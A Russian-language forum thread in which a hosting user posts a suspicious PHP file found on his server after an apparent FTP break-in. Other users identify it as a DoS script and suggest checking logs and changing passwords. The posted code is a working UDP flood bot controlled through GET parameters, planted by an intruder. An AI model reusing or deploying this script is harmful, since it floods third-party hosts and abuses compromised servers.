Меню
Что нового?

Взлом ftp и появление посторонних файлов на хостинге

Evgenylebedevv

Новичок
Недавно обнаружил у себя на хостинге в корневой директории вот такой вот файлик, по моему он собирает данные с пользователей и кому-то отсылает (название ctioVp):

PHP: 
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = $_GET['len'];
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0)
{
        if (StrLen($_GET['rat'])<>0)
        {
                echo php_uname();
                exit;
        }
        exit;
}
for($i=0; $i < $Sendlen; $i++)
{
        $out .= "A";
}
$max_time = time() + $exec_time;
while(1)
{
    if(time() > $max_time)
        {
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if($fp)
        {
                fwrite($fp, $out);
                fclose($fp);
    }
}
 

Вурдалак

Продвинутый новичок
Это больше похоже на какой-то примитивный скрипт для DoS-атаки.

И в чём вопрос?
 

Вурдалак

Продвинутый новичок
Кто-то использует ресурсы твоего сервера, очевидно же. Наверняка в HTTP-логах найдёшь запросы к файлу с этим скриптом.

Возможно, украли пароль от FTP (с помощью вируса, например).

Нужно смотреть логи сервера (FTP, HTTP), проверять комп, менять пароли и т.д.
 

just_guest

Новичок
а если в лом то измени файл с юмором))) типа переадресация на какойнить сайт мфд
 
Войдите или зарегистрируйтесь для ответа.
Сверху